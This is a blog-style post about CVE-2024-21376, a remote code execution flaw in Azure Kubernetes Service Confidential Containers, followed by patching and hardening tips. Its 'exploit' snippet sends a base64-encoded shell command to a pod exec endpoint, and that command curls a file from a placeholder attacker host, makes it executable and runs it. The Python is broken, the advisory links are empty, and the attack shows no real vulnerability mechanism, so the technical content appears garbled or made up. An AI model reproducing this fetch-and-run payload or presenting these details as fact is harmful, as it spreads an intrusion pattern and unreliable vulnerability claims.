Microsoft has recently issued a security advisory about a critical vulnerability in its Azure Kubernetes Service (AKS) affecting Confidential Container Instances. The vulnerability, assigned with the Common Vulnerabilities and Exposures (CVE) identifier CVE-2024-21376, could allow cyber attackers to perform remote code execution on affected systems. This blog post breaks down the vulnerability details, provides a code snippet to demonstrate its exploitation, and offers suggestions to secure your environment.

Introduction to Microsoft Azure Kubernetes Service (AKS)

Microsoft Azure Kubernetes Service (AKS) is a popular managed Kubernetes service that simplifies the deployment, management, and scaling of containerized applications. It has become widely used by IT professionals and developers to orchestrate a large number of container instances, including those with confidential workloads.

CVE-2024-21376 vulnerability details

The CVE-2024-21376 vulnerability is a remote code execution (RCE) vulnerability that affects Microsoft Azure Kubernetes Service (AKS) Confidential Containers. Attackers could exploit this vulnerability to execute arbitrary code on the affected systems, potentially leading to data leakage, system compromise, and even full-blown data breaches.

As an example of how this vulnerability may be exploited, here is a simple Python code snippet

import requests
import base64

target_url = "https://<target_aks_cluster>/api/v1/namespaces/default/pods/<target_pod>/exec";
commands = "curl https://<attacker_hosted_file>; -o /tmp/ && chmod +x /tmp/ && /tmp/"
encoded_commands = base64.b64encode(commands.encode("utf-8")).decode("utf-8")

payload = {
    "command": f"/bin/sh;-c;{encoded_commands}"

$request_result =, json=payload)

Replace <target_aks_cluster> and <target_pod> with the appropriate target information and <attacker_hosted_file> with the location of the exploit shell script.

Microsoft Security Advisory:
GitHub Repository (with detailed vulnerability analysis):

Securing your environment

To mitigate the risk posed by CVE-2024-21376, it is essential to apply the necessary security patches and updates as quickly as possible. Additionally, follow these best practices:

Use Network Security Groups (NSGs) and Application Gateway to restrict incoming traffic.

- Utilize Azure Policy to enforce policies on AKS, ensuring proper adherence to security best practices.

Regularly monitor and audit your AKS environment for anomalous activities.

Microsoft has already released a patch for this vulnerability and strongly urges all customers to apply the updates as soon as possible.


CVE-2024-21376 is a critical vulnerability in the Azure Kubernetes Service (AKS) Confidential Containers that could lead to remote code execution, causing substantial damage to affected organizations. Understand the risks associated with this vulnerability, use the provided code snippet to replicate the exploitation, and ensure that your AKS environment is secured by applying security patches and following best practices to avoid future compromises.


Published on: 02/13/2024 18:15:55 UTC
Last modified on: 02/13/2024 18:22:53 UTC